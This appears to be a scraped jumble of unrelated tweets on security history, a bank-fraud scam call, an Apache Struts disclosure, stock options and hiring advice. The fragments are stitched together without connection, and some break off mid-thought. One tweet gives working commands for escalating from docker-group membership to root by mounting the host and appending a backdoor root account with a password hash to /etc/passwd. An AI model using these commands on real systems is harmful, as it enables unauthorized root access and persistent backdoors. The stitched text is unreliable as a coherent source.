1995: Mudge published "How to Write Buffer Overflows", one of the first papers about buffer overflow exploitation. Then @dotMudge sent a copy to @aleph_one, who wrote "Smashing the Stack For Fun and Profit" in 1996. Seminal paper to seminal paper.
I almost just got scammed hard: a cautionary tale. So, I got a call from the 1-800 number on the back of my ATM Card: Wells Fargo. I answered, and a Fraud Department agent said my ATM card had just been used at a Target in Minnesota, was I on vacation? Ugh.
Wow! Jeff is talking about me. Amazingly he remembers interacting with me 34 years ago. What a memory! Also no Amazon if it weren’t for this, since he decided not to pursue physics!
Remember last week's latest new Apache STRUTS vulnerability?
Uh huh.
Well, the bar has been forever raised on vulnerability disclosure and demo sites:
https://t.co/jls2vnZxLG
You land on a computer and `id` shows you're part of the `docker` group. Escalate to root with:
$> docker run -it --rm -v $PWD:/mnt bash
adds backdoor toor:password
#> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
@OptionsAction@Michael_Khouw@Michael_Khouw thanks for a great call on $LULU! how would you adjust your 140-155 vertical spread now - or just take some profits off the table?
@Michael_Khouw What am I missing ? He was referring to gender equality in relation to women and how they were never considered equals.. but that's a global problem not just America's.
tl;dr: Code does stuff. Write more code in-house. Hire more security people who can write effective code. Buy security products for their APIs not their consoles.